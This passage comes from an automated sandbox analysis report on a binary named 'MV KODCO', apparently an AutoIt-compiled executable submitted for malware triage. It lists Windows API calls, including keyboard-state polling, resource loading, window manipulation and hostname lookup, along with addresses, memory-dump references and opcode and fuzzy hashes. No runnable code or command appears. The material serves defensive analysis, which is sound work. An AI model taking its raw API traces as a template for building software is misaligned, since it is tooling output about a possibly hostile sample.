                                                          • __swprintf.LIBCMT ref: 006267FD
                                                          • __swprintf.LIBCMT ref: 0062680A
                                                            • Part of subcall function 0060172B: __woutput_l.LIBCMT ref: 00601784
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00626834
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00626840
                                                          • LockResource.KERNEL32(00000000), ref: 0062684D
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 0062686D
                                                          • LoadResource.KERNEL32(?,00000000), ref: 0062687F
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0062688E
                                                          • LockResource.KERNEL32(?), ref: 0062689A
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006268F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID: 5i
                                                          • API String ID: 1433390588-1919848406
                                                          • Opcode ID: e5d0e2de48aaa161e61f3a84b861920272672aff50463fbd9d891c1aad0ba2d8
                                                          • Instruction ID: 7cd24a013cf09850480d003521d66f819c08c1018e7efb6952cdac2acc7e37a7
                                                          • Opcode Fuzzy Hash: e5d0e2de48aaa161e61f3a84b861920272672aff50463fbd9d891c1aad0ba2d8
                                                          • Instruction Fuzzy Hash: E231B071A0062AABDB10AF60EC54ABF7BAEEF09340F008425F902D6240E774DA11DF70
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006536F4,00000010,?,Bad directive syntax error,0067DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006225D6
                                                          • LoadStringW.USER32(00000000,?,006536F4,00000010), ref: 006225DD
                                                          • _wprintf.LIBCMT ref: 00622610
                                                          • __swprintf.LIBCMT ref: 00622632
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006226A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1080873982-4153970271
                                                          • Opcode ID: 086d683e8111e85c6da76ed7c909926edc0ca7957b1176cb9fde4ee10df5b773
                                                          • Instruction ID: d70c8e06cc236f9b88ab45f92e61613b0ee93e9e61e830a289b259fb0757cd26
                                                          • Opcode Fuzzy Hash: 086d683e8111e85c6da76ed7c909926edc0ca7957b1176cb9fde4ee10df5b773
                                                          • Instruction Fuzzy Hash: D321913294026ABFCF19AF90CC0AEEE7B3ABF18304F004459F545661A2EB71A619DF50
                                                          APIs
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00627B42
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00627B58
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00627B69
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00627B7B
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00627B8C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: SendString
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 890592661-1007645807
                                                          • Opcode ID: 4a5e532250f45270f6a171ea9be7625b5d0be26c743100e2d1912a701ebe1967
                                                          • Instruction ID: 08403ac9bab2e96cf71786b5633dfcf9e13234ea354cceb8693f3495ed587c69
                                                          • Opcode Fuzzy Hash: 4a5e532250f45270f6a171ea9be7625b5d0be26c743100e2d1912a701ebe1967
                                                          • Instruction Fuzzy Hash: 9211C8A0A401BA79DB24B7A2DC4ADFF7F7DEBD1B40F0004197451AA1C1EE604E45CAB0
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00627794
                                                            • Part of subcall function 005FDC38: timeGetTime.WINMM(?,75C0B400,006558AB), ref: 005FDC3C
                                                          • Sleep.KERNEL32(0000000A), ref: 006277C0
                                                          • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006277E4
                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00627806
                                                          • SetActiveWindow.USER32 ref: 00627825
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00627833
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00627852
                                                          • Sleep.KERNEL32(000000FA), ref: 0062785D
                                                          • IsWindow.USER32 ref: 00627869
                                                          • EndDialog.USER32(00000000), ref: 0062787A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 5176a29d4a947a1ff23dc27491e93e1b38ffc952216da58aa0057d288825cfca
                                                          • Instruction ID: aa6f975a0b3a3111bfc7baf5e567407319018a126ae1a8f1e251593bf0f7eee2
                                                          • Opcode Fuzzy Hash: 5176a29d4a947a1ff23dc27491e93e1b38ffc952216da58aa0057d288825cfca
                                                          • Instruction Fuzzy Hash: 17214F70608669BFEB016B21FC89F667F6BFB46348F046124F50782362CBB5AD11DE25
                                                          APIs
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • CoInitialize.OLE32(00000000), ref: 0063034B
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006303DE
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 006303F2
                                                          • CoCreateInstance.OLE32(0066DA8C,00000000,00000001,00693CF8,?), ref: 0063043E
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006304AD
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00630505
                                                          • _memset.LIBCMT ref: 00630542
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0063057E
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006305A1
                                                          • CoTaskMemFree.OLE32(00000000), ref: 006305A8
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006305DF
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 006305E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: bfce6f12002403c2e1ab0aaab7ecf092f1f6ad687815e794d52f2ef1dee4d9e9
                                                          • Instruction ID: 11413181af5302f029dc5418ca3a499e9d22d1ca312e1f683b50f77cf0a6982b
                                                          • Opcode Fuzzy Hash: bfce6f12002403c2e1ab0aaab7ecf092f1f6ad687815e794d52f2ef1dee4d9e9
                                                          • Instruction Fuzzy Hash: 24B1F974A00119AFDB04DFA4C998DAEBBBAFF88314F148499E905EB251DB70ED45CF90
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00622ED6
                                                          • SetKeyboardState.USER32(?), ref: 00622F41
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00622F61
                                                          • GetKeyState.USER32(000000A0), ref: 00622F78
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00622FA7
                                                          • GetKeyState.USER32(000000A1), ref: 00622FB8
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00622FE4
                                                          • GetKeyState.USER32(00000011), ref: 00622FF2
                                                          • GetAsyncKeyState.USER32(00000012), ref: 0062301B
                                                          • GetKeyState.USER32(00000012), ref: 00623029
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00623052
                                                          • GetKeyState.USER32(0000005B), ref: 00623060
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 94aa69ce7da1a64c51d41699dbb95dc8caaab03f8f193dee3ae404c68bb707c7
                                                          • Instruction ID: 5b31c19c906afbb01628d681dd2af7cc940dd4c7df19b5c4b9b0f7e54ee9b432
                                                          • Opcode Fuzzy Hash: 94aa69ce7da1a64c51d41699dbb95dc8caaab03f8f193dee3ae404c68bb707c7
                                                          • Instruction Fuzzy Hash: 7751F720A04FB539FB35DBA4A8107EABBB65F11340F08459DC5C25A3C2DB949B8CCF62
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 0061ED1E
                                                          • GetWindowRect.USER32(00000000,?), ref: 0061ED30
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0061ED8E
                                                          • GetDlgItem.USER32(?,00000002), ref: 0061ED99
                                                          • GetWindowRect.USER32(00000000,?), ref: 0061EDAB
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0061EE01
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0061EE0F
                                                          • GetWindowRect.USER32(00000000,?), ref: 0061EE20
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0061EE63
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0061EE71
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0061EE8E
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0061EE9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 4dcaa9f5f9c0c1cbf8610b6d5acce39f8753d3c250923a19101a5982b3446601
                                                          • Instruction ID: a51f4fb4823d934e086e138561647f48d9fe23054d09aa6585272405d8275ead
                                                          • Opcode Fuzzy Hash: 4dcaa9f5f9c0c1cbf8610b6d5acce39f8753d3c250923a19101a5982b3446601
                                                          • Instruction Fuzzy Hash: 1351FF71F00205AFDB18CF69DD95AAEBBBAFB88701F148129F91AD7290D7B1DD448B10
                                                          APIs
                                                            • Part of subcall function 005FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005FB759,?,00000000,?,?,?,?,005FB72B,00000000,?), ref: 005FBA58
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005FB72B), ref: 005FB7F6
                                                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,005FB72B,00000000,?,?,005FB2EF,?,?), ref: 005FB88D
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0065D8A6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005FB72B,00000000,?,?,005FB2EF,?,?), ref: 0065D8D7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005FB72B,00000000,?,?,005FB2EF,?,?), ref: 0065D8EE
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005FB72B,00000000,?,?,005FB2EF,?,?), ref: 0065D90A
                                                          • DeleteObject.GDI32(00000000), ref: 0065D91C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: b9aa53fc6d58138a107bf48d1bba7e598cb9f099714902980d2c46906bb8a4a5
                                                          • Instruction ID: aae17ec3f6ff735a7e0c36f2292cb7a269c04c98a1cebdbbf9674ecc859c698c
                                                          • Opcode Fuzzy Hash: b9aa53fc6d58138a107bf48d1bba7e598cb9f099714902980d2c46906bb8a4a5
                                                          • Instruction Fuzzy Hash: 46619C30901605DFEB35AF14D988B75BBB7FB96316F14251DE5428AAB0C778B884CF80
                                                          APIs
                                                            • Part of subcall function 005FB526: GetWindowLongW.USER32(?,000000EB), ref: 005FB537
                                                          • GetSysColor.USER32(0000000F), ref: 005FB438
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 7a35fd380c3cc0891c115a9ca6b99210d00b7776af60786c50794b0a1461ef43
                                                          • Instruction ID: 2aabcadff72acc5b4a9f944cc7913fd42accc2cb88c1af2f048856d8581e88a3
                                                          • Opcode Fuzzy Hash: 7a35fd380c3cc0891c115a9ca6b99210d00b7776af60786c50794b0a1461ef43
                                                          • Instruction Fuzzy Hash: 01419E30900158EBEF206F28DD8DBB93B67BB46725F184261FE658E1E6D7B48C41DB21
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                          • String ID:
                                                          • API String ID: 136442275-0
                                                          • Opcode ID: 7a87c1055ff69efc638e525009344f821fd46c9323cd618fc1e4c4c45ebe02b9
                                                          • Instruction ID: 8b6894921edce6d46706086f18bdedc927654a30e55f9a418875abe1d0c5bbd9
                                                          • Opcode Fuzzy Hash: 7a87c1055ff69efc638e525009344f821fd46c9323cd618fc1e4c4c45ebe02b9
                                                          • Instruction Fuzzy Hash: 0141527688512CAEDFA5DB90DC45DDF73BEEF44300F0041E6B659A2081EA30ABE58F54
                                                          APIs
                                                          • CharLowerBuffW.USER32(0067DC00,0067DC00,0067DC00), ref: 0062D7CE
                                                          • GetDriveTypeW.KERNEL32(?,00693A70,00000061), ref: 0062D898
                                                          • _wcscpy.LIBCMT ref: 0062D8C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: 98c99f73f93e505c57700447e0d6f4f1df8e09886e0b6e512023b10e9253c2cf
                                                          • Instruction ID: 25da14ff17718e4023a710428b02031a155100fe7612921a03506c9468b34a35
                                                          • Opcode Fuzzy Hash: 98c99f73f93e505c57700447e0d6f4f1df8e09886e0b6e512023b10e9253c2cf
                                                          • Instruction Fuzzy Hash: 0251E331104355AFC704EF14E886AAEBBAAFF84314F20882DF59A572A2DB35DD05CF42
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 005E93AB
                                                          • __itow.LIBCMT ref: 005E93DF
                                                            • Part of subcall function 00601557: _xtow@16.LIBCMT ref: 00601578
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf_xtow@16
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 1502193981-2263619337
                                                          • Opcode ID: ed05750a2aa0b1a96d0aedadeb2a2c82df78798c4daaf3c83f1d5de9163f64af
                                                          • Instruction ID: bf9ea2607309b3d1d5103e0a3e5add805c652065b34ebdef4e7104c6aceb486d
                                                          • Opcode Fuzzy Hash: ed05750a2aa0b1a96d0aedadeb2a2c82df78798c4daaf3c83f1d5de9163f64af
                                                          • Instruction Fuzzy Hash: 7541E671504205ABDB28DF75D945EAABBEAFF88304F2048AEE589D72C1EE31DD45CB10
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0064A259
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0064A260
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0064A273
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0064A27B
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0064A286
                                                          • DeleteDC.GDI32(00000000), ref: 0064A28F
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0064A299
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0064A2AD
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0064A2B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 8766af0e90e71232b6f6bae05195bf168bc7160be02ee500acb0a5c3ffe9fe4c
                                                          • Instruction ID: 0662cf2711afa82201c628b9f6d5dc5cccba4cc9c745861e6e1484eafc91ff1a
                                                          • Opcode Fuzzy Hash: 8766af0e90e71232b6f6bae05195bf168bc7160be02ee500acb0a5c3ffe9fe4c
                                                          • Instruction Fuzzy Hash: 25318D31640115BBDF115FA4DC49FEB3B6AFF1E360F140214FA19A61A0C7B6D811EBA4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 2620052-3771769585
                                                          • Opcode ID: 0db0b4c80d00bd3dee7f0bdc05ec416379f9553fbc8de4a6a75ebb6e384f9fcc
                                                          • Instruction ID: 6d715859c12ce275bab4c21def3ef1f252974ed56ed7cc5eea32165c2adb5866
                                                          • Opcode Fuzzy Hash: 0db0b4c80d00bd3dee7f0bdc05ec416379f9553fbc8de4a6a75ebb6e384f9fcc
                                                          • Instruction Fuzzy Hash: 0511E771A04125AFDF14AB70FD4AEDA7BAFEF40710F000069F105A61D1EFB49E818B65
                                                          APIs
                                                          • _memset.LIBCMT ref: 00605047
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          • __gmtime64_s.LIBCMT ref: 006050E0
                                                          • __gmtime64_s.LIBCMT ref: 00605116
                                                          • __gmtime64_s.LIBCMT ref: 00605133
                                                          • __allrem.LIBCMT ref: 00605189
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006051A5
                                                          • __allrem.LIBCMT ref: 006051BC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006051DA
                                                          • __allrem.LIBCMT ref: 006051F1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0060520F
                                                          • __invoke_watson.LIBCMT ref: 00605280
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
